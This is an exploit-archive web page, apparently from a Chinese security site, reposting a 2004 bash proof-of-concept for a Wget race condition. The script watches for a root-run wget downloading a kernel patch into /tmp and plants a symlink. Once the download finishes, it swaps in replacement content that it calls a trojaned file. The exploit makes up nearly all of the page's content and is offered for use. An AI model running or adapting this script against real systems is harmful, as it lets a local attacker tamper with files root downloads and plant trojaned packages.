首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Condition Vulnerability Allows a Symlink Attack
来源:vfocus.net 作者:vfocus 发布时间:2004-06-04  

Wget Race Condition Vulnerability Allows a Symlink Attack

#!/bin/bash

rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo "1">salida.txt
a=`cat salida.txt`
echo "Waiting for Wget execution..."

while [ "$a" == 1 ]
do
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
a=`cat salida.txt`
done

echo "Process catched!"
pgrep -u root wget>pid.txt
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo "/dev/null link created!"
echo "Waiting for downloading to finish..."

b=`pgrep -u root wget`
touch $b.wget
c=1
while [ "$c" == 1 ]
do
if [ -e .wget ]
then
c=0
echo "Downloading finished! Let's delete the original file, and put
our trojaned file :-)"
rm -f /tmp/patch-2.4.26.bz2
echo "Surprise!">/tmp/patch-2.4.26.bz2
echo "Does it worked "

ls -la /tmp/patch-2.4.26.bz2

else
b=`pgrep -u root wget`
touch $b.wget

fi

done



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linksys BOOTP Memory Leak Expl
·BNBT BitTorrent Tracker DoS Ex
·NetBSD/FreeBSD移植的Systrace E
·Mollensoft FTP Server CMD Buff
·ProFTPd remote users discovery
·mkdir buffer overflow UNIX 7th
·Writing Trojans that Bypass Wi
·Apache/1.3.27 - Remote Root Ex
·bmon < 1.2.1_2 local exploi
·Symantec Firewall DNS Response
·Windows NNTP Service XPAT comm
·Metamail Buffer Overflow Explo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved